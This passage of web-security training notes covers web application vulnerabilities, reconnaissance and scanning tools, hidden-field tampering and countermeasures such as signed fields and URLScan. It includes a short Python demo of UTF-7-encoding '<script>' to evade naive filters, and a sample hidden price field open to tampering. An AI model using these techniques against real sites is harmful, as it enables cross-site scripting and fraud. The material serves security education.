Protocol/Method Manipulation: Manipulating the particular protocol or the method used in the function, the attacker can hack into a web server.

Overflows: Some web server vulnerabilities take advantage of buffer overflows. By using buffer overflow techniques, the attacker can also make the server execute code of his choice, making it easier for him to exploit the server further.

---Regards,
Amarjit Singh

Web Application Vulnerabilities

Readers, we will now emphasize the need to secure web applications, as they can permit an attacker to compromise a web server or network over the legitimate port of entry. As more businesses host web based applications as a natural extension of themselves, the damage that can result from a compromise assumes significant proportions.

After completing this, you will be familiar with the following aspects:
  • Understanding Web Application Security

  • Common Web Application Security Vulnerabilities

  • Web Application Penetration Methodologies

  • Input Manipulation

  • Authentication And Session Management

  • Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth

  • Countermeasures


Understanding Web Application Security


Web based application security differs from the general discussion on security. In the general context, an IDS and/or firewall usually lends some degree of security. However, in the case of web applications, the session takes place through the allowed port - the default web server port 80. This is equivalent to establishing a connection without a firewall. Even if encryption is implemented, it only encrypts the transport protocol, and in the event of an attack, the attacker's session will simply be encrypted as well. Encryption does not thwart the attack.

Attacking web applications is one of the most common ways attackers compromise hosts, networks and users. It is a challenging task to defend against these attacks, as there is often little or no logging of the actions performed. This is particularly true for today's business applications, where a significant percentage of applications are custom made or sourced from third party software components.

Common Web Application Vulnerabilities
  • Reliability of Client-Side Data

  • Special Characters that have not been escaped

  • HTML Output Character Filtering

  • Root accessibility of web applications

  • ActiveX/JavaScript Authentication

  • Lack of User Authentication before performing critical tasks.

It has been noted that web application vulnerabilities can often be eliminated to a great extent by the way the applications are designed. Apart from this, common security procedures are often overlooked in the functioning of the application.

Threat

Reliability of Client-Side Data: It is recommended that the web application rely on server side data for critical operations rather than the client side data, especially for input purposes.

Threat

Special characters that have not been escaped: This aspect is often overlooked, and special characters that attackers can use to modify instructions are found in web application code. For example, UTF-7 provides alternative encodings for "<" and ">", and several popular browsers recognize these as the start and end of a tag.
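Python's built-in UTF-7 codec shows these alternative encodings; a filter that only looks for the literal characters "<" and ">" would miss them (exact codec output may differ slightly between implementations).

payload = "<script>"
print(payload.encode("utf-7"))                       # b'+ADw-script+AD4-'
print("<".encode("utf-7"), ">".encode("utf-7"))      # b'+ADw-' b'+AD4-'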

Threat

HTML Output Character Filtering: Output filtering helps a developer build an application which is not susceptible to cross site scripting attacks. When information is displayed to users, it should be escaped. HTML should be rendered inactive to prevent cross site scripting attacks.

Threat

Root accessibility of web applications: Ideally web applications should not expose the root directory of the web server. Sometimes, it is possible for the user to access the root directory if he can manipulate the input or the URL.

Threat

ActiveX/JavaScript Authentication: Client side scripting languages are vulnerable to attacks such as cross-site scripting.

Threat

Lack of user authentication before performing critical tasks: An obvious security lapse, where access to a restricted area is given without proper authentication, the authentication cache is reused, or logout procedures are poor. Such applications can be vulnerable to cookie based attacks.


Web Application Penetration Methodologies
  • Information Gathering and Discovery

    • Documenting Application / Site Map

    • Identifiable Characteristics / Fingerprinting

    • Signature Error and Response Codes

    • File / Application Enumeration

      • Forced Browsing

      • Hidden Files

      • Vulnerable CGIs

      • Sample Files

  • Input/Output Client-Side Data Manipulation

Penetrating web servers is no different from attacking other systems when it comes to the basic methodology. Here also, we begin with information gathering and discovery. This can be anything from searching for particular file types or banners on search engines like Google. For example, searching for "index/" may bring up unsuspecting directories on interesting sites where one may find information that can be used for penetrating the web server.

Hacking Tool: Instant Source

http://www.blazingtool.com

  • Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!

  • The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.

Instant Source is an application that lets the user view the underlying source code as he browses a web page. The traditional way of doing this has been the View Source command in the browser. However, the process was tedious as the viewer has to parse the entire text file if he is searching for a particular block of code. Instant Source allows the user to view the code for the selected elements instantly without having to open the entire source.

The program integrates into Internet Explorer and opens a new toolbar window, instantly displaying the source code of the page / selection in the browser window. Instant Source can show all Flash movies, script files (*.JS, *.VBS), style sheets (*.CSS) and images on a page. All external files can be demarcated and stored separately in a folder. The tool also includes HTML, JavaScript and VBScript syntax highlighting and support for viewing external CSS and script files directly in the browser. This is not available from the View Source command option.

With dynamic HTML, the source code changes after the basic HTML page loads - which is the HTML that was loaded from the server without any further processing. Instant Source integrates into Internet Explorer and shows these changes, thereby eliminating the need for an external viewer.

Hacking Tool: Lynx

http://lynx.browser.org

  • Lynx is a text-based browser used for downloading source files and directory links.

Lynx is a text browser client for users running cursor-addressable, character-cell display devices. It can display HTML documents containing links to files on the local system, as well as files on remote systems running http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and services accessible via logins to telnet, tn3270 or rlogin accounts. Current versions of Lynx run on UNIX, VMS, Windows3.x/9x/NT, 386DOS and OS/2 EMX.

Lynx can be used to access information on the Internet, or to build information systems intended primarily for local access. The current developmental Lynx has two PC ports. The ports are for Win32 (95 and NT) and DOS 386+. There is an SSL-enabled version of Lynx for Win32 by the name of lynxw32.lzh.

There is a default Download option of Save to disk. This is disabled if Lynx is running in anonymous mode. Any number of download methods such as kermit and zmodem may be defined in addition to this default in the lynx.cfg file.

Hacking Tool: Wget

www.gnu.org/software/wget/wget.html

  • Wget is a command line tool for Windows and Unix that will download the contents of a web site.

  • It works non-interactively, so it will work in the background, after having logged off.

  • Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded.

  • Both http and ftp retrievals can be time stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.

GNU Wget is a freely available network utility to retrieve files from the Internet using HTTP and FTP. It works non-interactively, allowing it to keep working in the background after the user has logged off. Recursive retrieval of HTML pages, as well as FTP sites, is supported. It can be used to make mirrors of archives and home pages, or to traverse the web like a WWW robot.

Wget works well on slow or unstable connections, continuing to retrieve a document until it is fully downloaded and resuming from where it left off on servers (both HTTP and FTP) that support it. Matching of wildcards and recursive mirroring of directories are available when retrieving via FTP. Both HTTP and FTP retrievals can be time-stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.

By default, Wget supports proxy servers, which can lighten the network load, speed up retrieval and provide access behind firewalls. However, if behind a firewall that requires a socks style gateway, the user can get the socks library and compile wget with support for socks.

Hacking Tool: Black Widow

http://softbytelabs.com

  • Black Widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.

  • Use it to scan a site and create a complete profile of the site's structure, files, E-mail addresses, external links and even link errors.

Another tool that can be found in an attacker's arsenal is Black Widow. This tool can be used for various purposes because it functions as a web site scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. Note its use as a site mirroring tool. An attacker can use it to mirror the target site on his hard drive and parse it for security flaws in the offline mode.

The attacker can also use this tool for the information gathering and discovery phase by scanning the site and creating a complete profile of the site's structure, files, e-mail addresses, external links and even error messages. This will help him launch a targeted attack that has more chance of succeeding and leaves a smaller footprint.

The attacker can also look for specific file types and download any selection of files: from 'JPG' to 'CGI' to 'HTML' to MIME types. There is no file size restriction, and the user can download small to large files that are part of a site or from a group of sites.

Hacking Tool: WebSleuth

http://sandsprite.com/sleuth/

  • WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.

WebSleuth is a tool that combines web crawling with the capability of a personal proxy. The current version of Sleuth supports functionality to convert hidden and select form elements to textboxes, perform efficient form parsing and analysis, edit the rendered source of web pages, and edit cookies in their raw state, among other things.

It can also make raw HTTP requests to servers impersonating the referrer, cookie, etc.; block JavaScript popups automatically; highlight and parse full HTML source code; and analyze CGI links, apart from logging all surfing activities and HTTP headers for requests and responses.

Sleuth can generate reports of the elements of a web page, and it facilitates enhanced proxy management as well as security settings management. Sleuth has the facility to monitor cookies in real time. The JavaScript console aids in interacting directly with the page's scripts and can remove all scripts from a web page.

Hidden Field Manipulation
  • Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.

  • Hidden fields serve as a means for the web application to pass information between different applications.

  • Using this method, an application may pass the data without saving it to a common backend system (typically a database.)

  • A major assumption about the hidden fields is that since they are non visible (i.e. hidden) they will not be viewed or changed by the client.

  • Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.

  • By changing the value, the entire logic between the different application parts is damaged, and the application is manipulated to accept the new value.

Hidden field tampering:

Most of us who have dabbled with some HTML coding have come across the hidden field. For example, a typical hidden field looks like this:

<input type="hidden" name="price" value="99.90">

Most web applications rely on HTML forms to receive input from the user. However, users can choose to save the form to a file, edit it and then use the edited form to submit data back to the server. Herein lies the vulnerability, as this is a "stateless" interaction with the web application. HTTP transactions are connectionless, one-time transmissions.

The conventional way of checking for the continuity of connection is to check the state of the user from information stored at the user's end (another pointer to the fallacy of trusting client side data). This state can be stored in a browser in three ways: cookies, encoded URLs and HTML form "hidden" fields.

Countermeasure

The first rule in web application development from a security standpoint is not to rely on client side data for critical processes. Using encrypted sessions such as SSL, or "secure" cookies, is advocated instead of using hidden fields. Digital signature algorithms may be used, where the values of critical parameters are hashed along with a digital signature to ascertain the authenticity of the data. The safest bet is to rely on server side authentication mechanisms for high security applications.
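One way to apply the hashing idea is to sign each hidden value with a server-side secret and reject any submission whose value no longer matches its signature; the key and field names below are illustrative, not a prescribed scheme.

import hmac
import hashlib

SECRET_KEY = b"server-side-secret"        # kept on the server, never sent to the client

def sign(value: str) -> str:
    return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()

# When rendering the form, emit the value together with its signature:
price = "199.99"
hidden_fields = {"price": price, "price_sig": sign(price)}

# When the form is submitted, verify before trusting the value:
def verify(value: str, signature: str) -> bool:
    return hmac.compare_digest(sign(value), signature)

print(verify("199.99", hidden_fields["price_sig"]))   # True
print(verify("1.99", hidden_fields["price_sig"]))     # False - the field was tampered with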

---Regards,
Amarjit Singh

Top20 Scan Method : Hacking Web Servers

This method scans the web server for the Top 20 vulnerabilities list published by SANS/FBI (www.sans.org).

Hacking Tool: WebInspect
  • WebInspect is an impressive Web server and application-level vulnerability scanner which scans for over 1500 known attacks.

  • It checks site contents and analyzes for rudimentary application issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.

  • It can analyze a basic web server in 4 minutes, cataloging over 1500 HTML pages.

WebInspect enables application and web services developers to automate the discovery of security vulnerabilities as they build applications, access detailed steps for remediation of those vulnerabilities and deliver secure code for final quality assurance testing.

With WebInspect, the developer can find and correct vulnerabilities at their source, before attackers can exploit them. WebInspect provides the technology necessary to identify vulnerabilities at the next level, the Web application.

Network Tool: Shadow Security Scanner

http://www.safety-lab.com

  • Shadow Security Scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments.

  • Shadow Security Scanner includes vulnerability auditing modules for many systems and services.

These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and more.

Running on its native Windows platform, SSS also scans servers built on practically any platform, successfully revealing vulnerabilities in Unix, Linux, FreeBSD, OpenBSD, NetBSD, Solaris and, of course, Windows 95/98/ME/NT/2000/XP/.NET. Because of its unique architecture, SSS is able to detect faults in CISCO, HP, and other network equipment. It is also capable of tracking more than 2,000 audits per system.

The Rules and Settings Editor will be essential for users who want to scan only the desired ports and services without wasting time and resources on scanning other services. Flexible tuning lets system administrators manage scanning depth and other options to benefit from speed-optimized network scanning without any loss in scanning quality.

Countermeasures
  • IISLockdown:

    • IISLockdown restricts anonymous access to system utilities as well as the ability to write to Web content directories.

    • It disables Web Distributed Authoring and Versioning (WebDAV).

    • It installs the URLScan ISAPI filter.

  • URLScan:

    • URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.

UrlScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator. Filtering requests helps secure the server by ensuring that only valid requests are processed. UrlScan helps protect Web servers because most malicious attacks share a common characteristic: they involve the use of a request that is unusual in some way. For instance, the request might be extremely long, request an unusual action, be encoded using an alternate character set, or include character sequences that are rarely seen in legitimate requests. By filtering unusual requests, UrlScan helps prevent such requests from reaching the server and potentially causing damage.

Summary
  • Web servers assume critical importance in the realm of Internet security.

  • Vulnerabilities exist in different releases of popular web servers and respective vendors patch these often.

  • The inherent security risks owing to compromised web servers have an impact on the local area networks that host these web sites, and even on ordinary users of web browsers.

  • Looking through the long list of vulnerabilities that have been discovered and patched over the past few years provides an attacker ample scope to plan attacks against unpatched servers.

  • Various tools and exploit code aid an attacker in perpetrating web server attacks.

  • Countermeasures include scanning for existing vulnerabilities and patching them immediately, restricting anonymous access, and screening and filtering incoming traffic requests.


---Regards,
Amarjit Singh